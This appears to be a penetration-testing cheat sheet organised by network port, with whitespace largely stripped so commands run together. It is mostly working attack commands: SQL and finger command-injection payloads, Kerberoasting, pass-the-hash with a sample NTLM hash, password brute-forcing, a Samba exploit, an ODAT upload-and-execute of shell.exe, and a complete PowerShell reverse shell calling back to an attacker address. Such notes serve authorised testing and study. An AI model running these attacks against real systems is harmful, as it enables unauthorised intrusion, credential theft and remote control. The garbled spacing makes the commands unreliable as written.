whois-h10.10.1.111-p43"domain.com"echo"domain.com"|nc-vn10.10.1.11143whois-h10.10.1.111-p43"a') or 1=1#"
Port 53 - DNS
# Transfer zonedigAXFRdomain.com@10.10.10.10# dig +multi AXFR @ns1.insecuredns.com insecuredns.comdnsrecon-taxfr-ddomainfierce-dnsdomain.com
Port 69 - UDP - TFTP
Vulns tftp in server 1.3, 1.4, 1.9, 2.1, and a few more.
Same checks as FTP Port 21.
nmap-p69--script=tftp-enum.nse10.11.1.111
Port 79 - Finger
nc-vn10.11.1.11179echo"root"|nc-vn10.11.1.11179# User enumerationfinger@10.11.1.111#List usersfingeradmin@10.11.1.111#Get info of userfingeruser@10.11.1.111#Get info of userfinger"|/bin/id@example.com"finger"|/bin/ls -a /@example.com"
nmap-p88--script=krb5-enum-users--script-args="krb5-enum-users.realm='DOMAIN.LOCAL'"IPuseauxiliary/gather/kerberos_enumusers# MSF# Check for Kerberoasting: GetNPUsers.pyDOMAIN-Target/-usersfileuser.txt-dc-ip<IP>-formathashcat/john# GetUserSPNsASREPRoast:impacket-GetUserSPNs<domain_name>/<domain_user>:<domain_user_password>-request-format<AS_REP_responses_format [hashcat |john]>-outputfile<output_AS_REP_responses_file>impacket-GetUserSPNs<domain_name>/-usersfile<users_file>-format<AS_REP_responses_format [hashcat |john]>-outputfile<output_AS_REP_responses_file># Kerberoasting: impacket-GetUserSPNs<domain_name>/<domain_user>:<domain_user_password>-outputfile<output_TGSs_file># Overpass The Hash/Pass The Key (PTK):python3getTGT.py<domain_name>/<user_name>-hashes [lm_hash]:<ntlm_hash>python3getTGT.py<domain_name>/<user_name>-aesKey<aes_key>python3getTGT.py<domain_name>/<user_name>:[password]# Using TGT key to excute remote commands from the following impacket scripts:python3psexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpython3smbexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-passpython3wmiexec.py<domain_name>/<user_name>@<remote_hostname>-k-no-pass# https://www.tarlogic.com/blog/como-funciona-kerberos/# https://www.tarlogic.com/blog/como-atacar-kerberos/pythonkerbrute.py-dc-ipIP-users/root/htb/kb_users.txt-passwords/root/pass_common_plus.txt-threads20-domainDOMAIN-outputfilekb_extracted_passwords.txt# https://blog.stealthbits.com/extracting-service-account-passwords-with-kerberoasting/# https://github.com/GhostPack/Rubeus# https://github.com/fireeye/SSSDKCMExtractor# https://gitlab.com/Zer1t0/cerbero
Port 110 - Pop3
telnet10.11.1.111USERpelle@10.11.1.111PASSadmin# or:USERpellePASSadmin# List all emailslist# Retrieve email number 5, for exampleretr9
# Enum hostnameenum4linux-n10.11.1.111nmblookup-A10.11.1.111nmap--script=smb-enum*--script-args=unsafe=1-T510.11.1.111# Get Versionsmbver.sh10.11.1.111Msfconsole;usescanner/smb/smb_versionngrep-i-dtap0's.?a.?m.?b.?a.*[[:digit:]]'smbclient-L \\\\10.11.1.111# Get Sharessmbmap-H10.11.1.111-Rechoexit|smbclient-L \\\\10.11.1.111smbclient \\\\10.11.1.111\\smbclient -L//10.11.1.111-Nnmap--scriptsmb-enum-shares-p139,445-T4-Pn10.11.1.111smbclient-L \\\\10.11.1.111\\# If got error "protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED"smbclient-L//10.11.1.111/--option='client min protocol=NT1'# Check null sessionssmbmap-H10.11.1.111rpcclient-U""-N10.11.1.111smbclient//10.11.1.111/IPC$ -N# Exploit null sessionsenum-s10.11.1.111enum-U10.11.1.111enum-P10.11.1.111enum4linux-a10.11.1.111#https://github.com/cddmp/enum4linux-ng/enum4linux-ng.py10.11.1.111-A-C/usr/share/doc/python3-impacket/examples/samrdump.py10.11.1.111# Connect to username sharessmbclient//10.11.1.111/share-Uusername# Connect to share anonymouslysmbclient \\\\10.11.1.111\\smbclient //10.11.1.111/smbclient//10.11.1.111/smbclient//10.11.1.111/<""sharename"">rpcclient-U" "10.11.1.111rpcclient-U" "-N10.11.1.111# Check vulnsnmap--scriptsmb-vuln*-p139,445-T4-Pn10.11.1.111# Multi exploitsmsfconsole; useexploit/multi/samba/usermap_script; setlhost192.168.0.X; setrhost10.11.1.111; run# Bruteforce loginmedusa-h10.11.1.111-uuserhere-P/usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt-Msmbntnmap-p445--scriptsmb-brute--script-argsuserdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt10.11.1.111-vvvvnmap–scriptsmb-brute10.11.1.111# nmap smb enum & vuln nmap--scriptsmb-enum-*,smb-vuln-*,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-protocols-p139,44510.11.1.111nmap--scriptsmb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse,smb-ls.nse,smb-mbenum.nse,smb-os-discovery.nse,smb-print-text.nse,smb-psexec.nse,smb-security-mode.nse,smb-server-stats.nse,smb-system-info.nse,smb-vuln-conficker.nse,smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-regsvc-dos.nse-p139,44510.11.1.111# Mount smb volume linuxmount-tcifs-ousername=user,password=password//x.x.x.x/share/mnt/share# rpcclient commandsrpcclient-U""10.11.1.111srvinfoenumdomusersgetdompwinfoquerydominfonetshareenumnetshareenumall# Run cmd over smb from linuxwinexe-Uusername//10.11.1.111"cmd.exe"--system# smbmapsmbmap.py-H10.11.1.111-uadministrator-pasdf1234#Enumsmbmap.py-uusername-p'P@$$w0rd1234!'-dDOMAINNAME-x'net group "Domain Admins" /domain'-H10.11.1.111#RCEsmbmap.py-H10.11.1.111-uusername-p'P@$$w0rd1234!'-L# Drive Listingsmbmap.py-uusername-p'P@$$w0rd1234!'-dABC-H10.11.1.111-x'powershell -command "function ReverseShellClean {if ($c.Connected -eq $true) {$c.Close()}; if ($p.ExitCode -ne $null) {$p.Close()}; exit; };$a=""""192.168.0.X""""; $port=""""4445"""";$c=New-Object system.net.sockets.tcpclient;$c.connect($a,$port) ;$s=$c.GetStream();$nb=New-Object System.Byte[] $c.ReceiveBufferSize ;$p=New-Object System.Diagnostics.Process ;$p.StartInfo.FileName=""""cmd.exe"""" ;$p.StartInfo.RedirectStandardInput=1 ;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.UseShellExecute=0 ;$p.Start() ;$is=$p.StandardInput ;$os=$p.StandardOutput ;Start-Sleep 1 ;$e=new-object System.Text.AsciiEncoding ;while($os.Peek() -ne -1){$out += $e.GetString($os.Read())} $s.Write($e.GetBytes($out),0,$out.Length) ;$out=$null;$done=$false;while (-not $done) {if ($c.Connected -ne $true) {cleanup} $pos=0;$i=1; while (($i -gt 0) -and ($pos -lt $nb.Length)) { $read=$s.Read($nb,$pos,$nb.Length - $pos); $pos+=$read;if ($pos -and ($nb[0..$($pos-1)] -contains 10)) {break}} if ($pos -gt 0){ $string=$e.GetString($nb,0,$pos); $is.write($string); start-sleep 1; if ($p.ExitCode -ne $null) {ReverseShellClean} else { $out=$e.GetString($os.Read());while($os.Peek() -ne -1){ $out += $e.GetString($os.Read());if ($out -eq $string) {$out="""" """"}} $s.Write($e.GetBytes($out),0,$out.length); $out=$null; $string=$null}} else {ReverseShellClean}};"'# Reverse Shell# Check\Policies\{REG}\MACHINE\Preferences\Groups\Groups.xmllookforuser&pass"gpp-decrypt "# CrackMapExeccrackmapexecsmb10.55.100.0/23-uLA-ITAdmin-H573f6308519b3df23d9ae2137f549b15--localcrackmapexecsmb10.55.100.0/23-uLA-ITAdmin-H573f6308519b3df23d9ae2137f549b15--local--lsa# Impacketpython3samdump.pySMB172.21.0.0# Check for systems with SMB Signing not enabledpython3RunFinger.py-i172.21.0.0/24
Port 161/162 UDP - SNMP
nmap-vv-sV-sU-Pn-p161,162--script=snmp-netstat,snmp-processes10.11.1.111nmap10.11.1.111-Pn-sU-p161--script=snmp-brute,snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-ios-config,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-userssnmp-check10.11.1.111-cpublic|private|communitysnmpwalk-cpublic-v1ipaddress1snmpwalk-cprivate-v1ipaddress1snmpwalk-cmanager-v1ipaddress1onesixtyone-c/usr/share/doc/onesixtyone/dict.txt172.21.0.X# Impacketpython3samdump.pySNMP172.21.0.0# MSF aux modulesauxiliary/scanner/misc/oki_scannerauxiliary/scanner/snmp/aix_versionauxiliary/scanner/snmp/arris_dg950auxiliary/scanner/snmp/brocade_enumhashauxiliary/scanner/snmp/cisco_config_tftpauxiliary/scanner/snmp/cisco_upload_fileauxiliary/scanner/snmp/cnpilot_r_snmp_lootauxiliary/scanner/snmp/epmp1000_snmp_lootauxiliary/scanner/snmp/netopia_enumauxiliary/scanner/snmp/sbg6580_enumauxiliary/scanner/snmp/snmp_enumauxiliary/scanner/snmp/snmp_enum_hp_laserjetauxiliary/scanner/snmp/snmp_enumsharesauxiliary/scanner/snmp/snmp_enumusersauxiliary/scanner/snmp/snmp_login
oscanner-s10.11.1.111-P1521tnscmd10gversion-h10.11.1.111tnscmd10gstatus-h10.11.1.111nmap-p1521-A10.11.1.111nmap-p1521--script=oracle-tns-version,oracle-sid-brute,oracle-bruteMSF:goodmodulesunderauxiliary/admin/oracleandscanner/oracle# https://github.com/quentinhardy/odat./odat-libc2.5-i686all-s10.11.1.111-p1521./odat-libc2.5-i686sidguesser-s10.11.1.111-p1521./odat-libc2.5-i686passwordguesser-s10.11.1.111-p1521-dXE# Upload reverse shell with ODAT:./odat-libc2.5-i686utlfile-s10.11.1.111-p1521-Uscott-Ptiger-dXE--sysdba--putFilec:/shell.exe/root/shell.exe# and run it:./odat-libc2.5-i686externaltable-s10.11.1.111-p1521-Uscott-Ptiger-dXE--sysdba--execc:/shell.exe
nmap-p111,2049--scriptnfs-ls,nfs-showmountshowmount-e10.11.1.111# If you find anything you can mount it like this:mount10.11.1.111://tmp/NFS–onolockmount-tnfs10.11.1.111://tmp/NFS–onolock
nmap--script=mysql-databases.nse,mysql-empty-password.nse,mysql-enum.nse,mysql-info.nse,mysql-variables.nse,mysql-vuln-cve2012-2122.nse10.11.1.111-p3306mysql--host=10.11.1.111-uroot-p# MYSQL UDF 4.x/5.0https://www.adampalmer.me/iodigitalsec/2013/08/13/mysql-root-to-system-root-with-udf-for-windows-and-linux/